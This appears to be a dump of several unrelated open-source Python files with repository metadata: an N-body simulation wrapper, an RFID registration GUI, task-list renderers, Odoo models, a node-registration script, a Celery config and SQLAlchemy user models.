    def max_collision_events(self):
        """Maximum number of collision events to record."""
        if self.__integrator is not None:
            # BUG FIX: previously read the non-existent attribute
            # `self.__integrator.collision_events`.
            self.__max_collision_events = self.__integrator.max_collision_events
        return self.__max_collision_events

    @max_collision_events.setter
    def max_collision_events(self, value):
        self.__max_collision_events = value
        if self.__integrator is not None:
            self.__integrator.max_collision_events = value

    @property
    def close_encounter_distance(self):
        """Distance threshold below which a close encounter is recorded."""
        if self.__integrator is not None:
            # BUG FIX: previously read `max_close_encounter_events` instead of
            # the integrator's `close_encounter_distance`.
            self.__close_encounter_distance = self.__integrator.close_encounter_distance
        return self.__close_encounter_distance

    @close_encounter_distance.setter
    def close_encounter_distance(self, value):
        self.__close_encounter_distance = value
        if self.__integrator is not None:
            self.__integrator.close_encounter_distance = value

    @property
    def close_encounter_output_file(self):
        if self.__integrator is not None:
            self.__close_encounter_output_file = self.__integrator.close_encounter_output_file
        return self.__close_encounter_output_file

    @close_encounter_output_file.setter
    def close_encounter_output_file(self, value):
        self.__close_encounter_output_file = value
        if self.__integrator is not None:
            self.__integrator.close_encounter_output_file = value

    @property
    def collision_output_file(self):
        if self.__integrator is not None:
            self.__collision_output_file = self.__integrator.collision_output_file
        return self.__collision_output_file

    @collision_output_file.setter
    def collision_output_file(self, value):
        self.__collision_output_file = value
        if self.__integrator is not None:
            self.__integrator.collision_output_file = value

    @property
    def integrator(self):
        """The active integrator instance; raises if none has been set."""
        if self.__integrator is None:
            raise RuntimeError('Integrator not set!')
        return self.__integrator

    @integrator.setter
    def integrator(self, name_of_integrator):
        if self.__integrators is None:
            self.__integrators = Integrator.load_integrators()
        print(('Setting the integrator to %s' % name_of_integrator))
        # Instantiate the named integrator and push the cached parameters into it.
        if name_of_integrator in self.__integrators:
            self.__integrator = getattr(self.__integrators[name_of_integrator], name_of_integrator)()
            self.__integrator.CONST_G = self.CONST_G
            self.__integrator.t_end = self.__t_end
            self.__integrator.h = self.__h
            self.__integrator.t_start = self.__t_start
            self.__integrator.output_file = self.output_file
            self.__integrator.collision_output_file = self.collision_output_file
            self.__integrator.close_encounter_output_file = self.close_encounter_output_file
            self.__integrator.store_dt = self.__store_dt
            self.__integrator.buffer_len = self.__buffer_len

    @property
    def particles(self):
        """The integrator's particle set; raises if no integrator is set."""
        if self.__integrator is None:
            raise RuntimeError('Particle sets undefined because the integrator is not set!')
        return self.__integrator.particles

    @property
    def t(self):
        """Current simulation time (mirrors the integrator when attached)."""
        if self.__integrator is not None:
            self.__t = self.__integrator.t
        return self.__t

    @property
    def CONST_G(self):
        """Gravitational constant used by the simulation."""
        if self.__integrator is not None:
            self.__CONST_G = self.__integrator.CONST_G
        return self.__CONST_G

    @CONST_G.setter
    def CONST_G(self, value):
        self.__CONST_G = value
        if self.__integrator is not None:
            self.__integrator.CONST_G = value

    @property
    def CONST_C(self):
        """Speed of light; post-Newtonian terms are enabled when > 0."""
        if self.__integrator is not None:
            self.__CONST_C = self.__integrator.CONST_C
        return self.__CONST_C

    @CONST_C.setter
    def CONST_C(self, value):
        self.__CONST_C = value
        if self.__integrator is not None:
            self.__integrator.CONST_C = value

    @property
    def t_end(self):
        """Termination time of the integration."""
        if self.__integrator is not None:
            self.__t_end = self.__integrator.t_end
        return self.__t_end

    @t_end.setter
    def t_end(self, tf):
        self.__t_end = tf
        if self.__integrator is not None:
            self.__integrator.t_end = tf

    @property
    def h(self):
        """Integration time step (optional for adaptive integrators)."""
        if self.__integrator is not None:
            self.__h = self.__integrator.h
        return self.__h

    @h.setter
    def h(self, value):
        self.__h = value
        if self.__integrator is not None:
            self.__integrator.h = value

    @property
    def store_dt(self):
        """Time interval between successive data outputs."""
        if self.__integrator is not None:
            # BUG FIX: `self.__integrator.__store_dt` was name-mangled by
            # Python to `_ABIE__store_dt`, which does not exist on the
            # integrator and raised AttributeError.
            self.__store_dt = self.__integrator.store_dt
        return self.__store_dt

    @store_dt.setter
    def store_dt(self, value):
        self.__store_dt = value
        if self.__integrator is not None:
            self.__integrator.store_dt = self.__store_dt

    @property
    def buffer_len(self):
        """Size of a dataset in an HDF5 group."""
        if self.__integrator is not None:
            self.__buffer_len = self.__integrator.buffer_len
        return self.__buffer_len

    @buffer_len.setter
    def buffer_len(self, value):
        self.__buffer_len = value
        if self.__integrator is not None:
            self.__integrator.buffer_len = self.__buffer_len

    @property
    def acceleration_method(self):
        """Backend used to evaluate accelerations (e.g. 'numpy' or 'ctypes')."""
        return self.integrator.acceleration_method

    @acceleration_method.setter
    def acceleration_method(self, value):
        self.__integrator.acceleration_method = value

    def initialize(self, config=None):
        """Initialize the integrator (GaussRadau15 by default) and, when a
        parsed config dict is supplied, populate parameters and initial
        conditions from it."""
        self.__integrators = Integrator.load_integrators()
        if self.__integrator is None:
            print('Use GaussRadau15 as the default integrator...')
            self.integrator = 'GaussRadau15'
            self.integrator.initialize()
            self.integrator.acceleration_method = 'ctypes'
        else:
            self.__integrator.CONST_G = self.CONST_G
            self.__integrator.t_end = self.__t_end
            self.__integrator.h = self.__h
            self.__integrator.t_start = self.__t_start
            self.__integrator.output_file = self.output_file
            self.__integrator.store_dt = self.__store_dt
            self.__integrator.buffer_len = self.__buffer_len
        if config is not None:
            # Gravitational parameter
            self.integrator.CONST_G = np.array(config['physical_params']['G'])
            # Integration parameters
            self.integrator = config['integration']['integrator']
            self.integrator.initialize()
            self.integrator.h = float(config['integration']['h'])
            if 'acc_method' in config['integration']:
                self.integrator.acceleration_method = config['integration']['acc_method']
            else:
                self.integrator.acceleration_method = 'ctypes'
            # Optional sequence of object names for the initial conditions.
            names = config.get('names')
            # Initial and final times (only if not already set explicitly).
            if self.integrator.t_start == 0:
                self.integrator.t_start = float(config['integration']['t0'])
            if self.integrator.t_end == 0:
                self.integrator.t_end = float(config['integration']['tf'])
            self.integrator.active_integrator = config['integration']['integrator']
            DataIO.ic_populate(config['initial_conds'], self, names=names)

    def stop(self):
        """Stop the integrator and clean up the memory."""
        self.integrator.stop()

    def set_additional_forces(self, ext_acc):
        """Register a user-supplied extra acceleration vector of length 3 * N."""
        if ext_acc.ndim == 1 and ext_acc.shape[0] == 3 * self.integrator.particles.N:
            self.integrator.set_additional_forces(ext_acc)
        else:
            print('WARNING: Additional forces array needs to be 3 * N vector, where N is the number of particles.')

    def integrate(self, to_time=None):
        """Advance the simulation to `to_time` (or the configured `t_end`).

        Ctrl+C stops the integrator cleanly and exits the process.
        """
        try:
            return self.integrator.integrate(to_time)
        except KeyboardInterrupt:
            print('Keyboard Interruption detected (Ctrl+C). Simulation stopped. Stopping the code...')
            self.stop()
            sys.exit(0)

    def calculate_orbital_elements(self, primary=None):
        """Return the orbital elements of all particles w.r.t. `primary`."""
        return self.integrator.calculate_orbital_elements(primary)

    def calculate_energy(self):
        """Return the total energy of the system."""
        return self.integrator.calculate_energy()

    def add(self, pos=None, vel=None, x=None, y=None, z=None, vx=None, vy=None, vz=None, mass=0.0, name=None,
            radius=0.0, ptype=0, a=None, e=0.0, i=0.0, Omega=0.0, omega=0.0, f=0.0, primary=None):
        """Add a particle, given either a Cartesian state (pos/vel or the
        individual x..vz components) or orbital elements (a, e, i, Omega,
        omega, f) relative to `primary`."""
        # BUG FIX: the position-assembly block was duplicated; build it once.
        if x is not None and y is not None and z is not None:
            pos = np.empty(3, dtype=np.double)
            pos[0] = x
            pos[1] = y
            pos[2] = z
        if vx is not None and vy is not None and vz is not None:
            vel = np.empty(3, dtype=np.double)
            vel[0] = vx
            vel[1] = vy
            vel[2] = vz
        return self.integrator.particles.add(pos=pos, vel=vel, mass=mass, name=name, radius=radius,
                                             ptype=ptype, a=a, e=e, i=i, Omega=Omega,
                                             omega=omega, f=f, primary=primary)
def main():
    """Command-line entry point: parse arguments, configure an ABIE run, integrate."""
    parser = argparse.ArgumentParser()
    parser.add_argument('-c', '--config', help='config file', default=None)
    parser.add_argument('-o', '--output_file', dest='output_file', help='output data file', default='data.hdf5')
    parser.add_argument('-r', '--rebound_file', help='Rebound simulation file', default=None)
    parser.add_argument('-t', '--t_end', type=float, dest='t_end', help='Termination time')
    parser.add_argument('-d', '--dt', type=float, dest='dt', help='Integration time step (optional for certain integrators)', default=None)
    parser.add_argument('-s', '--store_dt', type=float, dest='store_dt', help='output time step', default=100)
    parser.add_argument('-i', '--integrator', dest='integrator', help='Name of the integrator [GaussRadau15|WisdomHolman|RungeKutta|AdamsBashForth|LeapFrog|Euler]', default='GaussRadau15')
    opts = parser.parse_args()

    sim = ABIE()
    sim.integrator = opts.integrator
    if opts.output_file is not None:
        sim.output_file = opts.output_file
    if opts.t_end is not None:
        sim.t_end = opts.t_end

    # Initial conditions come either from a config file or a rebound snapshot.
    if opts.config is not None:
        sim.initialize(DataIO.parse_config_file(opts.config))
    elif opts.rebound_file is not None:
        sim.initialize()
        DataIO.ic_populate_from_rebound(opts.rebound_file, sim)

    if opts.dt is not None:
        sim.h = opts.dt
    sim.store_dt = opts.store_dt
    sim.integrate()
# Run the command-line entry point when executed as a script.
if __name__ == "__main__":
    main()
| [
"maxwellemail@gmail.com"
] | maxwellemail@gmail.com |
c36f7a69fafecec3d2e69a8488282cbbc98906bb | 90f8077e9460764dc2d90a8ea1d1913e463bfcef | /gui.py | ca12f5061382e762efca1030aadf89dbc8fa188a | [] | no_license | area515/rfidreader | bf82808ffcea1207752520aeadf0a6c20672467c | 4460b79ce96ff45a83e42b8edc2cf26b9ccff9f1 | refs/heads/master | 2021-01-17T14:02:09.177095 | 2016-08-03T01:09:29 | 2016-08-03T01:09:29 | 18,233,249 | 8 | 3 | null | 2016-08-03T01:09:30 | 2014-03-29T03:10:03 | Python | UTF-8 | Python | false | false | 3,054 | py | '''
@author: Sean O'Bryan, Ross Hendrickson
'''
from Tkinter import *
import Tkinter
import tkMessageBox
import os
import subprocess
import rfid
import gnupg
import pygame
# Main application window.
root = Tk()
root.wm_title("RFID Reader")
root.columnconfigure(0, weight=1)
# make a solenoid
# NOTE(review): 12 and 10 are presumably GPIO pin numbers -- confirm against rfid.Solenoid.
solenoid = rfid.Solenoid(12, 10)
# make an rfid reader (background thread updating reader.lastkey)
reader = rfid.Reader(solenoid)
reader.start()
def play_sound(filename):
    """Play an audio file and block until playback has finished.

    :param filename: path to a sound file supported by pygame.mixer.music
    """
    pygame.mixer.init()
    pygame.mixer.music.load(filename)
    pygame.mixer.music.play()
    # Wait for playback to end. Clock.tick() sleeps between polls instead of
    # busy-spinning the CPU at 100% as the previous `while ...: continue` did.
    clock = pygame.time.Clock()
    while pygame.mixer.music.get_busy():
        clock.tick(10)
def Refresher():
    # Poll the reader once per second; when a newly scanned key differs from
    # what the label shows, play a feedback sound and update the display.
    if labelrfidoutput.cget("text") != reader.lastkey:
        play_sound('readtag.wav')
    labelrfidoutput.config(text=reader.lastkey)
    # Re-schedule itself on the Tk event loop.
    labelrfidoutput.after(1000, Refresher)  # every second...
def encrypt(message, recipient='globalw2865@gmail.com', gnupg_home='/home/pi/.gnupg'):
    """Encrypt *message* with GPG and return the ASCII-armored ciphertext.

    The recipient and keyring location were previously hard-coded; they are
    now parameters whose defaults preserve the original behavior, so existing
    callers are unaffected.

    :param message: plaintext string to encrypt
    :param recipient: GPG key identifier of the recipient
    :param gnupg_home: path to the GnuPG home directory (keyring)
    """
    gpg = gnupg.GPG(gnupghome=gnupg_home)
    encrypted_data = gpg.encrypt(message, recipient)
    return str(encrypted_data)
def Clear():
    """Reset the form: blank the key label, both entry fields, and the reader state."""
    labelrfidoutput.config(text="")
    for entry_widget in (entryname, entryemail):
        entry_widget.delete(0, Tkinter.END)
    reader.lastkey = ""
def Submit():
    """Collect the form fields plus the scanned tag, GPG-encrypt the
    pipe-separated record, append it to Output.txt, and confirm."""
    play_sound('submit.wav')
    name = entryname.get()
    email = entryemail.get()
    key = reader.lastkey
    # Record format (pre-encryption): name|email|tag-id, one per line.
    message = "%s|%s|%s\n" % (name,email,key)
    with open("Output.txt", "a") as text_file:
        text_file.write(encrypt(message))
    # NOTE(review): "submited" typo is user-visible runtime text; left as-is here.
    tkMessageBox.showinfo("Success", "Your info was submited.")
# Frame grouping the registration-form widgets.
labelframepersonalinfo = LabelFrame(root, text="Personal Info")
labelframepersonalinfo.grid(row=3, sticky = W+E+N+S )
labelframepersonalinfo.columnconfigure(1, weight=1)
labelframepersonalinfo.rowconfigure(0, weight=1)
labelframepersonalinfo.rowconfigure(1, weight=1)
labelframepersonalinfo.rowconfigure(2, weight=1)
labelframepersonalinfo.rowconfigure(3, weight=1)
# Name label/entry. NOTE: "stick" only works because Tcl accepts it as an
# unambiguous abbreviation of the -sticky grid option -- presumably; confirm.
labelname = Label(labelframepersonalinfo, text="Name")
labelname.grid(row=0, column=0,stick = W)
entryname = Entry(labelframepersonalinfo, bd =5)
entryname.grid(row=0, column=1, stick = W+E)
# Email label/entry
labelemail = Label(labelframepersonalinfo, text="Email")
labelemail.grid(row=1, column=0,stick = W)
entryemail = Entry(labelframepersonalinfo, bd =5)
entryemail.grid(row=1, column=1, stick = W+E)
# RFID key label; its text is refreshed by Refresher() from reader.lastkey.
labelkey = Label(labelframepersonalinfo, text="Key")
labelkey.grid(row=2, column=0, sticky = W)
labelrfidoutput = Label(labelframepersonalinfo, text="Scan your key...") #, textvariable=reader.lastkey)
labelrfidoutput.grid(row=2, column=1,sticky = W+E+N+S)
# Reset button clears the whole form (see Clear()).
buttonclear = Button(labelframepersonalinfo, text="Reset", command=Clear)
buttonclear.grid(row=3, columnspan=2,sticky = W+E+N+S)
# Submit button encrypts and stores the record (see Submit()).
buttonsubmitinfo = Button(labelframepersonalinfo, text="Submit", command=Submit)
buttonsubmitinfo.grid(row=4, columnspan=2,sticky = W+E+N+S)
# Kick off the 1-second polling loop, then enter the Tk main loop.
labelrfidoutput.after(1000, Refresher) # every second...
#.showinfo(title, message, options)
root.mainloop()
| [
"stobryan@gmail.com"
] | stobryan@gmail.com |
12b51993b07c520189e37f6d63646560f98ae82d | ea83b212a42554d1a783c2d5ad2dc2c4c946f330 | /plugin/taskmage2/asttree/renderers.py | 03793fbb0c5bf14455a7128772a1803d44ac33a4 | [
"BSD-2-Clause"
] | permissive | willjp/vim-taskmage | 9e80b5cd7c906221d95feb29e399e7a17b59c44f | adcf809ccf1768753eca4dadaf6279b34e8d5699 | refs/heads/master | 2022-01-07T16:10:34.696385 | 2021-12-27T21:05:26 | 2021-12-27T21:05:26 | 99,585,518 | 1 | 0 | BSD-2-Clause | 2021-02-10T05:42:43 | 2017-08-07T14:16:10 | Python | UTF-8 | Python | false | false | 11,401 | py | #!/usr/bin/env python
"""
Name : taskmage2.parser.renderers.py
Created : Jul 27, 2018
Author : Will Pittman
Contact : willjpittman@gmail.com
________________________________________________________________________________
Description : A collection of classes to render a Parser object
into different formats.
________________________________________________________________________________
"""
# builtin
from __future__ import absolute_import, division, print_function
import os
import abc
import json
from taskmage2.parser import fmtdata
# external
# internal
class Renderer(object): # pragma: no cover
    """Abstract base class for AST renderers.

    Concrete subclasses consume a :py:obj:`taskmage2.parser.parsers.Parser`
    abstract-syntax-tree (exposed read-only through :py:attr:`ast`) and
    implement :py:meth:`render` to produce their output format.
    """
    __metaclass__ = abc.ABCMeta

    def __init__(self, ast):
        """Store the AST that will be rendered."""
        super(Renderer, self).__init__()
        self._ast = ast

    @property
    def ast(self):
        """The wrapped abstract-syntax-tree (read-only)."""
        return self._ast

    def render(self):
        """Produce the rendered output; subclasses must override."""
        raise NotImplementedError
class TaskList(Renderer):
    """ `AST` to ReStructuredText inspired TaskList format.
    Displays files/sections/tasks, hierarchy, and status.

    Example:

        .. code-block:: ReStructuredText

            * {*768D3CDC543044488462C9CE6B823404*} saved task
                * new task
                o started task
                - skipped task
                x finished task

            home
            ====

            * clean kitchen

    """
    # Underline characters per header nesting level (shared format table).
    indent_lvl_chars = fmtdata.TaskList.indent_lvl_chars

    def __init__(self, ast):
        super(TaskList, self).__init__(ast)

    def render(self):
        """Render the parser's AST.

        Returns:
            list of str: one entry per output line, e.g.
            ``['* task1', '    * subtask1', '* task2', ...]``
        """
        render = []
        for node in self.ast:
            render = self._render_node(render, node, parent=None, indent=0)
        return render

    def _render_node(self, render, node, parent, indent=0):
        """Recursively render `node` and all of its children, appending to
        and returning the running list of output lines."""
        # TODO: now that all nodes contain a reference to their
        # parent node, this can probably be simplified
        node_renderer_map = {
            'file': self._render_fileheader,
            'section': self._render_sectionheader,
            'task': self._render_task,
        }
        if node.type not in node_renderer_map:
            raise NotImplementedError(
                'unexpected nodetype: {}'.format(repr(node))
            )
        render.extend(
            node_renderer_map[node.type](node, parent, indent)
        )
        for child in node.children:
            # indentation is reset at 0 for tasks within sections/files
            if all([
                node.type in ('section', 'file'),
                child.type == 'task',
            ]):
                render = self._render_node(render, child, node, indent=0)
            else:
                render = self._render_node(render, child, node, indent=indent + 1)
        return render

    def _render_fileheader(self, node, parent, indent=0):
        """Render a file-header node as an underlined title, e.g.
        ``file::home/misc.task`` (prefixed with ``{*id*}`` when set),
        padded with a blank line above and below."""
        char = self.indent_lvl_chars[indent]
        header_title = 'file::{}'.format(node.name)
        if node.id:
            header_title = ''.join(['{*', node.id, '*}']) + header_title
        return [
            '',
            header_title,
            char * len(header_title),
            '',
        ]

    def _render_sectionheader(self, node, parent, indent=0):
        """Render a section-header node as an underlined title.

        NOTE(review): the underline length here is ``len(node.name)``
        rather than ``len(header_title)`` as in ``_render_fileheader``,
        so with an id the underline is shorter than the title --
        confirm whether this asymmetry is intentional.
        """
        char = self.indent_lvl_chars[indent]
        header_title = ''
        if node.id:
            header_title += ''.join(['{*', node.id, '*}'])
        header_title += node.name
        return [
            '',
            header_title,
            char * len(node.name),
            '',
        ]

    def _render_task(self, node, parent, indent=0):
        """Render a task node as ``<indent><statuschar>{*id*} name``;
        extra lines of a multi-line name become continuation lines."""
        # produce `data`
        data = {
            'status_char': '',
            'id_str': '',
            'indent_spc': '',
            'name': node.name,
        }
        # NOTE(review): the next call's result is discarded -- it duplicates
        # the assignment below and looks like dead code (safe to remove if
        # fmtdata.TaskList.statuschar is side-effect free; confirm).
        fmtdata.TaskList.statuschar(node.data.status)
        data['status_char'] = fmtdata.TaskList.statuschar(node.data.status)
        if node.id:
            data['id_str'] = ''.join(['{*', node.id, '*}'])
        data['indent_spc'] = ' ' * (4 * indent)
        lines = node.name.split('\n')
        # format output
        returns = ['{indent_spc}{status_char}{id_str} '.format(**data) + lines[0]]
        for i in range(1, len(lines)):
            returns.append('{} {}'.format(data['indent_spc'], lines[i]))
        return returns
class TaskDetails(Renderer):
    """ `AST` to an INI inspired view of a single task's info.

    Not implemented yet: instantiation always raises NotImplementedError.
    """
    def __init__(self, ast):
        raise NotImplementedError()
class Mtask(Renderer):
    """ `AST` to JSON -- stores all info.

    Every node (file/section/task) becomes one JSON object per line
    inside a JSON array; task nodes carry status/created/finished/modified.
    """
    def __init__(self, ast):
        super(Mtask, self).__init__(ast)

    def render(self):
        """Render the AST as JSON text.

        Returns:
            list of str: the lines of a JSON array document (one node per
            line; trailing empty string yields a final newline on join).
        """
        render = []
        for node in self.ast:
            render = self._render_node(render, node, indent=0)
        # one node per line
        json_nodes = [' {},'.format(json.dumps(r)) for r in render]
        # remove comma from last entry
        # (bug fix: an empty AST previously raised IndexError here)
        if json_nodes:
            json_nodes[-1] = json_nodes[-1][:-1]
        render_json = ['[']
        render_json.extend(json_nodes)
        render_json.append(']')
        render_json.append('')
        return render_json

    def _render_node(self, render, node, indent=0):
        """Recursively append the dict form of `node` and all of its
        children (depth-first) to `render`, returning the running list."""
        node_renderer_map = {
            'task': self._render_task,
            'section': self._render_sectionheader,
            'file': self._render_fileheader,
        }
        if node.type not in node_renderer_map:
            msg = 'unexpected nodetype: {}'.format(repr(node))
            raise NotImplementedError(msg)
        perform_render = node_renderer_map[node.type]
        render.append(perform_render(render, node, indent))
        for child in node.children:
            render = self._render_node(render, child, indent=indent + 1)
        return render

    def _render_fileheader(self, render, node, indent=0):
        """Dict form of a file node (no task metadata)."""
        return {
            '_id': node.id,
            'type': node.type,
            'name': node.name,
            'indent': indent,
            'parent': node.parentid,
            'data': {},
        }

    def _render_sectionheader(self, render, node, indent=0):
        """Dict form of a section node (no task metadata)."""
        return {
            '_id': node.id,
            'type': node.type,
            'name': node.name,
            'indent': indent,
            'parent': node.parentid,
            'data': {},
        }

    def _render_task(self, render, node, indent=0):
        """Dict form of a task node; datetimes serialize as ISO-8601.

        Asymmetric defaults are kept for format compatibility: unset
        created/modified serialize as null, unset finished as false.
        """
        created = None
        finished = False
        modified = None
        if node.data.created is not None:
            created = node.data.created.isoformat()
        if node.data.finished:
            finished = node.data.finished.isoformat()
        if node.data.modified is not None:
            modified = node.data.modified.isoformat()
        return {
            '_id': node.id,
            'type': node.type,
            'name': node.name,
            'indent': indent,
            'parent': node.parentid,
            'data': {
                'status': node.data.status,
                'created': created,
                'finished': finished,
                'modified': modified,
            },
        }
if __name__ == '__main__': # pragma: no cover
    from taskmage2.parser import lexers, iostream, parser
    dirname = os.path.dirname(os.path.abspath(__file__))
    # walk three directory levels up to the project root (examples/ lives there)
    for i in range(3):
        dirname = os.path.dirname(dirname)
    def ex_tasklist():
        # demo: parse examples/example.tasklist, re-render it as TaskList text
        print('========')
        print('Tasklist')
        print('========')
        print()
        with open('{}/examples/example.tasklist'.format(dirname), 'rb') as fd:
            lexer = lexers.TaskList(iostream.FileDescriptor(fd))
            parser_ = parser.Parser(lexer)
            renderer = TaskList(parser_)
            for line in renderer.render():
                print(line)
    def ex_mtask():
        # demo: parse examples/example.mtask_, re-render it as Mtask JSON
        print('=====')
        print('Mtask')
        print('=====')
        print()
        with open('{}/examples/example.mtask_'.format(dirname), 'rb') as fd:
            lexer = lexers.Mtask(fd)
            parser_ = parser.Parser(lexer)
            renderer = Mtask(parser_)
            for line in renderer.render():
                print(line)
    ex_tasklist()
    ex_mtask()
| [
"willjpittman@gmail.com"
] | willjpittman@gmail.com |
6d21cd382eeb98e10bb5bc8a2a202726211def5f | ce6ace34704e74c2a53e9b38b2630876d9cd52e2 | /mdias_addons/metro_park_maintenance/models/day_plan_limit.py | 8f25985b0d5a8f7e281a0c359a8c74c657e8ef34 | [] | no_license | rezaghanimi/main_mdias | e3cfd8033204d8e7e484041f506892621a3e3479 | 13b428a5c4ade6278e3e5e996ef10d9fb0fea4b9 | refs/heads/master | 2022-09-17T20:15:42.305452 | 2020-05-29T05:38:35 | 2020-05-29T05:38:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 861 | py |
# -*- coding: utf-8 -*-
from odoo import models, fields, api
class DayPlanLimit(models.Model):
    '''
    Daily plan limit: per-location constraints used by maintenance scheduling.
    '''
    _name = 'metro_park_maintenance.day_plan_limit'
    location = fields.Many2one(string='地点', comodel_name='metro_park_base.location')
    # Maximum number of peak-hour trains that may be taken in for repair.
    max_repair_after_high_run = fields.Integer(string='高峰车最大检修数量')
    # Latest return time, stored as free-form text.
    max_repair_back_time = fields.Char(string="返回时间", help='最大返回时间')
class DayPlanWizardLimit(models.TransientModel):
    '''
    Transient (wizard) variant of the daily plan limit.

    Bug fix: this class was previously also named ``DayPlanLimit``,
    shadowing the persistent model class above at module level. Odoo
    registers models by ``_name`` (unchanged here), so renaming the
    Python class preserves ORM behavior while making both classes
    reachable by name.
    '''
    _name = 'metro_park_maintenance.day_plan_wizard_limit'
    location = fields.Many2one(string='地点', comodel_name='metro_park_base.location')
    # Maximum number of peak-hour trains that may be taken in for repair.
    max_repair_after_high_run = fields.Integer(string='高峰车最大检修数量')
    # Latest return time, stored as free-form text.
    max_repair_back_time = fields.Char(string="返回时间", help='最大返回时间')
| [
"619851623@qq.com"
] | 619851623@qq.com |
c02b9d675382a884756e42df5c3b5955974d4bd5 | d8521979287af3633ae065c5d187aa4ac9636672 | /BlockApp/core/req4register.py | 86b4a1ee44ba1a38fbe0b7e69c5666b32e028adf | [
"MIT"
] | permissive | AlbertChanX/BlockChain | 3289e74e47221996dcac8c12cdc2e7ddbdd7f9af | 5b21145bdd8b742cf7fe3b725f16a18ddf34aacf | refs/heads/master | 2023-08-15T11:00:52.973165 | 2021-09-28T12:34:44 | 2021-09-28T12:34:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 468 | py | import requests,json
import fire
def register(url, node_url):
    """POST *node_url* to ``<url>/register`` as a JSON payload and print
    the node list, HTTP status code, and JSON response body."""
    payload = {"node" : [node_url]}
    endpoint = url + '/register'
    print(payload['node'])
    # post data must be json string
    response = requests.post(endpoint, data=json.dumps(payload))
    print(response.status_code)
    print(response.json())
# python3 req4register.py http://127.0.0.1:8000 http://127.0.0.1:8001
if __name__ == '__main__':
    # fire turns register() into a CLI: positional args map to (url, node_url).
    fire.Fire(register)
"292368101@qq.com"
] | 292368101@qq.com |
8621122cc4212144fa368ce62b7b1f138087f702 | aecc10302c1a69f27b1cec4173aabcfc2b18706d | /artemis/celery_mq.py | f0c5bbf60f33684184a6ed44db3c8c3a338aaf0e | [
"Apache-2.0"
] | permissive | shangjunimo/ooqitech-artemis | ac6047e8fab8dc3086d1254bc88ba3e5c2cdc566 | bd410c274d2bf01fe69423589b19f2b7aabb7ead | refs/heads/master | 2023-01-13T16:46:36.559436 | 2019-09-19T08:06:29 | 2019-09-19T08:06:29 | 209,502,880 | 0 | 0 | Apache-2.0 | 2022-12-27T15:35:34 | 2019-09-19T08:33:26 | JavaScript | UTF-8 | Python | false | false | 525 | py | # -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
from celery import Celery
from event_consumer.handlers import AMQPRetryConsumerStep
from artemis.settings import CELERY_CONSUMER_MQ_BROKER_URL
class Config:
    """Celery configuration namespace, consumed via config_from_object()."""
    # Use local (Shanghai) wall-clock time rather than UTC for scheduling.
    enable_utc = False
    timezone = 'Asia/Shanghai'
    # Broker and result backend share the same AMQP URL from settings.
    BROKER_URL = CELERY_CONSUMER_MQ_BROKER_URL
    CELERY_RESULT_BACKEND = CELERY_CONSUMER_MQ_BROKER_URL
# Module-level Celery app. AMQPRetryConsumerStep (event_consumer package)
# plugs retry-aware AMQP consumers into the worker's consumer blueprint.
consumer_app = Celery()
consumer_app.config_from_object(Config)
consumer_app.steps['consumer'].add(AMQPRetryConsumerStep)
| [
"hui.yang@ooqi.cn"
] | hui.yang@ooqi.cn |
c0ad5e4f594c2a0a8a067a743865488afb3283c2 | 7cdf3898d32f397475033d282cd9907fb0f0e239 | /api/v1/database.py | 630b5a385410ec500e77f52ed4b455c7cd1e4ba9 | [] | no_license | Monk-Liu/Orienteering | fccbc9f4d679aa88783d87c085f70d135aff15c7 | 1c7f88fa7c31c202509d37841f0b159a74398acc | refs/heads/master | 2021-01-19T06:59:09.083177 | 2016-06-27T12:00:48 | 2016-06-27T12:00:48 | 46,102,081 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,349 | py | from config import SQLINFO
import sqlalchemy
from sqlalchemy import Column,Integer,String,Text,DateTime,Float
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker,relationship,backref
from sqlalchemy.schema import Table,ForeignKey
import redis
import uuid
from utils import encrytovalue
def Redis():
    """Stub: formerly returned a redis.Redis('localhost', 6379, 0)
    connection (see the commented-out line); currently returns None.

    NOTE(review): any caller expecting a live connection will break --
    confirm whether this is intentionally disabled.
    """
    #return redis.Redis('localhost',6379,0)
    return
# SQLAlchemy engine, declarative base, and session factory built from the
# SQLINFO settings in config.py.
engine = sqlalchemy.engine_from_config(SQLINFO)
Base = declarative_base()
Session = sessionmaker(bind=engine)
# two way to make one to one relationship backref or foreignkey
'''
ToDo: 1.set Column as unicode,text
2.cascade : default is save-update merge
other contain all,delte-orphan,
see:http://docs.sqlalchemy.org/en/latest/orm/cascades.html#backref-cascade
3.passive_detele
4.what's the difference between unicode and string
'''
class UserEvent(Base):
    """Association object linking a user to an event they joined, with
    per-user completion data (many-to-many with extra columns)."""
    __tablename__ = 'user_event'
    event_id = Column(String(50), ForeignKey('events.id'),primary_key=True)
    user_id = Column(Integer, ForeignKey('userinfo.id'),primary_key=True)
    finish_time = Column(String(20))
    finish_points = Column(Integer) # Originally this was to map to Points rows, but a faster
    # encoding is used instead: a single integer in the style of Linux 1/4/7 permission digits.
    event = relationship("Event")
    parent = relationship("UserInfo")
    def __init__(self, finish_time='', finish_points=0):
        self.finish_time = finish_time
        self.finish_points = finish_points
class User(Base):
    """Login account: phone plus password, keyed by a UUID string id."""
    __tablename__ = 'users'
    id = Column(String(50),primary_key=True)
    phone = Column(String(20))
    password = Column(String(50))
    # One-to-one link to the profile row (backref 'user' on UserInfo).
    info = relationship('UserInfo',backref=backref('user',uselist=False))
    def __init__(self,phone=None,password=None,id=None):
        """Create a fresh account (phone + password -> new UUID id, password
        run through utils.encrytovalue -- presumably a hash, confirm) or
        wrap an existing account when ``id`` is given."""
        if not id:
            self.phone = str(phone)
            self.id = str(uuid.uuid4())
            self.password = encrytovalue(password)
        else:
            self.id = id
    def __repr__(self):
        # NOTE(review): the repr string is missing its closing '>'.
        return "<User (phone='%s',id='%s')"%(self.phone,self.id)
class OAuthor(Base):
    """Third-party OAuth identity, keyed by the provider's openid.

    NOTE(review): ``id`` has no primary_key/ForeignKey; it looks intended
    to reference users.id -- confirm.
    """
    __tablename__ = 'OAuthor'
    id = Column(String(50));
    openid = Column(String(70),primary_key=True)
    def __init__(self,id):
        # The constructor argument is the provider openid; a fresh UUID is
        # generated for the local id.
        self.openid = id
        self.id = str(uuid.uuid4())
class UserInfo(Base):
    """User profile: display data plus relationships to joined events
    (via UserEvent) and hosted events."""
    __tablename__ = 'userinfo'
    id = Column(Integer,primary_key=True)
    user_id = Column(String(50),ForeignKey('users.id'))
